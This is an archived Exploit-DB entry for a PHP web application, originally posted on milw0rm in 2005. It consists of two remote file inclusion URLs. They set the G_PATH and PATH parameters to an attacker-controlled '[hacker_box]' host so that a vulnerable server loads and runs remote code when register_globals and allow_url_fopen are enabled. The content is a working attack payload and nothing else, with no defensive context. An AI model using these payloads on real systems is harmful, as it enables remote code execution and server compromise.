exploit-db-mirror/platforms/php/webapps/864.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

7 lines
246 B
Text
Executable file

Example:
if register_globals=on and allow_url_fopen=on:
http://[victim]/[dir]/include/init.inc.php?G_PATH=http://[hacker_box]/
http://[victim]/[dir]/backend/addons/links/index.php?PATH=http://[hacker_box]/
# milw0rm.com [2005-03-07]